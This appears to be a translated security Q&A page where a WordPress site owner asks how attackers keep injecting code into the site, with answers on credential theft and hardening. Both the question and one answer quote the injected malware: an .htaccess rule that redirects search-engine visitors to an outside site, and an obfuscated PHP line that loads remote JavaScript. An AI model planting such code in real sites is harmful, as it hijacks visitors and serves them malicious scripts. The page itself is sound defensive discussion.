如何防止我的网站受到恶意软件注入攻击?

信息安全 攻击 恶意软件 攻击预防
2021-08-24 20:16:41

我的网站被谷歌禁止为恶意软件网站。当我检查代码时,我发现一些代码在我的服务器上注入了许多文件。我手动清理了所有内容,通过从所有文件中的注入代码中搜索一些代码来编辑我的服务器(共享主机)上的所有文件。甚至 .htaccess 文件也被攻击者修改了。

网站上有两个 WordPress 安装,位于网站根目录的两个不同子文件夹中,没有更新。我都更新了。

然后谷歌取消了对我网站的禁令。

昨天,我发现我网站上的 .htaccess 文件再次被攻击者修改。这是代码:

#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#

我在所有文件中搜索了“b58b6f”,但没有找到。我认为这是最近一次攻击修改的唯一文件。我删除了这个 .htaccess 文件,因为我不需要它。

黑客是如何入侵我的网站的?如何防止这种情况再次发生?如何让我的网站更安全?

3个回答

您遇到的恶意软件似乎是“daysofyorr.com 病毒”或MW:HTA:7

我建议您使用 FileZilla 作为 FTP 客户端。如果是这样,您必须知道 FileZilla 以纯文本形式存储您网站的凭据。病毒可能已经访问了您的凭据,然后访问了您所有注册的网站以搜索 WordPress 安装,以便通过插入此代码来更新文件。

现在,您应该:

  • 在您的计算机上搜索任何病毒、恶意软件等。
  • 更改保存在 FileZilla 中的所有已注册 FTP 帐户的 FTP 密码
  • 最终使用更好的 FTP 系统,例如 WinSCP

迟来的评论,但我怀疑您使用 FileZilla 作为您的 FTP 客户端。您是否知道 FileZilla 将您的 FTP 站点凭据(站点/用户/密码)存储在 %APPDATA% 文件夹中的纯文本文件中?

而且我还怀疑您的计算机上存在隐藏的恶意软件。它抓取了您的 FileZilla 凭证文件,并使用它们来更改您 header.php在主题文件夹中的文件。事实上,我怀疑你会发现你所有的主题文件夹都发生header.php了变化。

如果您有足够的技术来查看您的 FTP 日志文件,您会发现可以访问这些文件:下载,然后上传更改的文件。您可能还会发现一些随机文件名已上传到您的根(“主”)文件夹,尽管这些文件已被黑客删除。

而且,你会发现黑客的FTP日志中的IP地址来自中国。

建议:卸载 FileZilla,从 %APPDATA% 文件夹中删除 FileZilla 文件夹,更改您的 FTP 密码(和您的主机密码)。并查找任何已更改header.phpfooter.php、 和wp-settings.php 文件。

对于“daysofyorr.com 病毒”,您可以通过检查您的一些 PHP 文件(如index.php)来确认这一点,如果您找到以下代码:

#b58b6f#
echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
#/b58b6f#

而已!

有关信息,它转换为:

<script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>

如今,这似乎导致了404。

  1. 检查日志,看看你是否可以找出它被破坏的点
  2. 确保您的 Wordpress 和任何插件都是最新的。由于 Wordpress 是一个如此常用的系统,因此它很容易出现漏洞。
  3. 如果您仍然无法弄清楚发生了什么,可能值得联系为您提供共享托管的公司并让他们意识到这个问题,因为这可能是由于应用程序过时或他们托管的东西造成的。

  1. 如果您的托管公司有他们自己的 wordpress 版本,他们会不断更新,我会建议您自己使用 VS 全新安装。受到威胁的可能性会降低,因为您很可能只能通过管理面板访问它。

  2. 至于 Filezilla,它确实支持 SFTP 和 FTPS,因此如果您的主机支持加密的 FTP,这可能是另一种选择。

  3. 最后,您可能能够阻止北美以外的 IP 范围,这可能有助于阻止攻击,因为大多数攻击来自海外,因此通常不值得追求合法途径。

其它你可能感兴趣的问题
上一篇如何制定安全策略? 下一篇“信任网络”的替代方案